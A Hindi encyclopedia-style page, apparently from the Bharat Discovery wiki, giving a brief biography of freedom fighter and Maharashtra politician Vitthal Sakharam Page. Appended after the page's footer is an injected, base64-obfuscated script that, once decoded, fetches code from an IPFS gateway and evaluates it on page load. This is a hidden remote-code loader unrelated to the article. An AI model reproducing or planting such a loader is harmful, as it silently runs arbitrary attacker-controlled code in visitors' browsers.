विट्ठल सखाराम पागे

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
विट्ठल सखाराम पागे पर डाक टिकट

विट्ठल सखाराम पागे (अंग्रेज़ी: Vitthal Sakharam Page, जन्म- 21 जुलाई, 1910; मृत्यु- 16 मार्च, 1990) भारत के जाने-माने स्वतन्त्रता सेनानी थे। एक क्रांतिकारी व्यक्ति होने के साथ-साथ वह एक कुशल राजनीतिज्ञ के रूप में भी जाने-पहचाने जाते थे।

  • विट्ठल सखाराम पागे का जन्म जुलाई, 1910 में ज़िला सतारा, महाराष्ट्र में हुआ था।
  • उन्होंने अपनी लॉ की डिग्री मुंबई से ली।
  • वह एक बहुत अच्छे राजनीतिज्ञ थे। उन्होंने 11 जुलाई 1960 से 24 अप्रैल 1978 तक महाराष्ट्र विधान परिषद के 5वें अध्यक्ष के रूप में कार्य किया था।
  • विट्ठल सखाराम पागे 'भारतीय रोजगार गारंटी योजना' के प्रणेता के रूप में प्रसिद्ध हैं।
  • भारतीय डाक विभाग ने उनके योगदान को मान्यता देते हुए एक डाक टिकट जारी किया था।
  • उनकी प्रतिबद्धता के कारणों में 1940 में व्यक्तिगत सत्याग्रह और 1942 का भारत छोड़ो आंदोलन शामिल थे, जिसके लिए उन्हें जेल की सजा सुनाई गई थी।
  • सन 1972 में महाराष्ट्र को भयंकर सूखे का सामना करना पड़ा था, जिसके कारण 'रोजगार गारंटी योजना' शुरू की गई थी।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>